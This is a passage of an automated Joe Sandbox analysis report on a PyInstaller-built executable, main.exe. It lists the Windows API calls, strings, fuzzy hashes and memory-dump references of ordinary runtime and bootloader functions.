                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA42360
                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA4241A
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFormatMessageProcess
                                                                                                                                                                                                                                                        • String ID: %ls$%ls: $<FormatMessageW failed.>$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 27993502-4247535189
                                                                                                                                                                                                                                                        • Opcode ID: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                        • Instruction ID: 19a7a8b15d85e73f11c4a1279b4f9e404feaa5e7373c786491b6863a9784ed22
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31E562B0AA4141E6209B25B9106AAB661FF88BD8F400135EF8DD3B79FE3CE106C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D2DD
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D2EB
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D315
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D383
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6ABA4D50A,?,?,?,00007FF6ABA4D1FC,?,?,?,00007FF6ABA4CDF9), ref: 00007FF6ABA4D38F
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: ec1d8984956c5f4cef63aabdc1ab3d005d502d88db624b4fbd9ceb099b80f4f4
                                                                                                                                                                                                                                                        • Instruction ID: 2210fdfbd23f8990022f36a552a6468f69fbc0a58ce8731364c8c2b154fc2d0b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec1d8984956c5f4cef63aabdc1ab3d005d502d88db624b4fbd9ceb099b80f4f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA31AF21B1BA4291EE219B06A80027923D4FF4DBA4F5A0535DF9D8B3A4FF3CE8558200
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                        • Opcode ID: bdf35f00908a663c977b541a1155eb73016cf86817925c7fc1db5880fcbaeba1
                                                                                                                                                                                                                                                        • Instruction ID: b33e1610c106f3bbb28eb042ad49301e434d97bf3726dbc925d7d167c8ab0afe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdf35f00908a663c977b541a1155eb73016cf86817925c7fc1db5880fcbaeba1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4141BD71A1AA87A1EA20DB64E4142EA6365FF5C784F800132EB5DC36B6FF3CE615C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        • Opcode ID: 6cd12d297b2340e5ffa7c7392ce0e4cdced9a85fa0896577ca3510b685e0d80d
                                                                                                                                                                                                                                                        • Instruction ID: b6deb2a23c0337fd3bc4d35765c76f8a06834286bfabb8308c005e4ed047f0f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cd12d297b2340e5ffa7c7392ce0e4cdced9a85fa0896577ca3510b685e0d80d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC218B61B0F28242FAA9A77596912395252CF4C7B0F044734DB3ED7AFAFE6DB9418304
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                        • Opcode ID: 09a7ef29c2f791f79e4b414a588c98caae924e0a86b8d7fe5631f15f3a619b4d
                                                                                                                                                                                                                                                        • Instruction ID: 8cc93a29b3eb8882e8e90cd25300e7cf4600ec6fe78740a6d23928b995b8cc0f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09a7ef29c2f791f79e4b414a588c98caae924e0a86b8d7fe5631f15f3a619b4d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB1190B1B19A4186E7608B56E85432972A0FB8CBE4F104235EB5DC7BA4EF7CD4548740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(FFFFFFFF,?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA479E2
                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47A39
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA48950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6ABA43A04,00000000,00007FF6ABA41965), ref: 00007FF6ABA48989
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47AC8
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47B34
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47B45
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF6ABA48706), ref: 00007FF6ABA47B5A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C1D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C20D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C23A
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C24B
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C25C
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6ABA55E51,?,?,?,?,00007FF6ABA5B392,?,?,?,?,00007FF6ABA580CB), ref: 00007FF6ABA5C277
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C2AF
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C2CE
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C2F6
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C307
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C318
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$Process$ConsoleCurrentShowSleepThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3908687701-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                        • Instruction ID: 7e14cb1de2c4d2c3b61e1697ac64c2c2665a0e67eb30eced840101c469ba60e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C861B332909BC585D7649F15E4403AAB7A0FB88794F044635EB9C43BA9EF7CE590CB04
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        • Opcode ID: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                        • Instruction ID: 4d80d14208d084ed4629ab7c29738892fa27871bfcc700d1d627efd5100fc909
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87518F32A09282CAEB788F65944436C77A0FB58B85F144135DB8D87BE6DF3CE865C705
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,00007FF6ABA4866F), ref: 00007FF6ABA4226E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %ls$WARNING$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3372507544
                                                                                                                                                                                                                                                        • Opcode ID: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                        • Instruction ID: 0f0936174f6b6d594f7ef2af3578d3d3c9a9b4434be434ff77ebc15096e26458
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C21D462B1AB8251E6209BA5F4552EA7764FF887C4F400136EB8D93A7AEF3CD215C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        • Opcode ID: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                        • Instruction ID: 93cfaf73ed36a944483f2887a85fe253cc6ac327d0b572cc79da454294b22f54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9D10472B09A8189E710CF79D4406EC37B1FB48798B444235CF9E97BA9EE38E526C704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                        • Instruction ID: 8b1bb1ae2783f108b2544dabfa7c5e666038497eeb62cea21e7812fac954dcf0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5413D62A0978242FB249B2DD4213B96660EF98BA4F144235EF5C87AF5FF3CD481C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA59F82
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6ABA4C165), ref: 00007FF6ABA59FA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                        • API String ID: 3580290477-1027480231
                                                                                                                                                                                                                                                        • Opcode ID: 2a2f06ea51d58fd39cad35a47b9855af257a0ebd26d3c321afc8fcfaab6f6b1a
                                                                                                                                                                                                                                                        • Instruction ID: 0df473f01b1b802c0adabc9597d9decf5d255899f8d4b031dd303b560e170165
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a2f06ea51d58fd39cad35a47b9855af257a0ebd26d3c321afc8fcfaab6f6b1a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E32A0AB5296EB24DF65E4400BD37A4EB48784F444135EB4E87B66FF3DE5858244
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: 57f6403a17afa6857eb93518903eebf05678db2d18f563f749b6ba14b42682ba
                                                                                                                                                                                                                                                        • Instruction ID: 274b87c4c894451c9fa987e645fdc5811081c5823bcf923e943152a353694870
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57f6403a17afa6857eb93518903eebf05678db2d18f563f749b6ba14b42682ba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0041E362B1AA8181EB208F25E4447A977A1FB88784F814131EF8DC77A8EF7CD511C704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6ABA41B4A), ref: 00007FF6ABA42070
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %s: %s$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3704582800
                                                                                                                                                                                                                                                        • Opcode ID: a5f084cc36529dd82358bb6d3c03fbfc020d3d736b3f3fde6876dd26524326fa
                                                                                                                                                                                                                                                        • Instruction ID: b291f8475dc1fa3caf229ec95cbd43e06106647aa178b8013fd11ba4d138a2d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5f084cc36529dd82358bb6d3c03fbfc020d3d736b3f3fde6876dd26524326fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C21F363B1AA8156E6209761BC116E66294FFCCBD4F400131FF8DD7B6AEE3CD156C200
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                        • Opcode ID: e405b3d95a77a686cd9e65060fb5efdbb8b04b637a4feec6827f9fe163836890
                                                                                                                                                                                                                                                        • Instruction ID: cd91884033939f6956dbe565d44bf8f49972abdeebe5162cea6ec19b9aca23e5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e405b3d95a77a686cd9e65060fb5efdbb8b04b637a4feec6827f9fe163836890
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5218162B0968181EB20DB29D4A426D73B1FB8CB84F854135DB8D83695EF7CE985C780
                                                                                                                                                                                                                                                        APIs
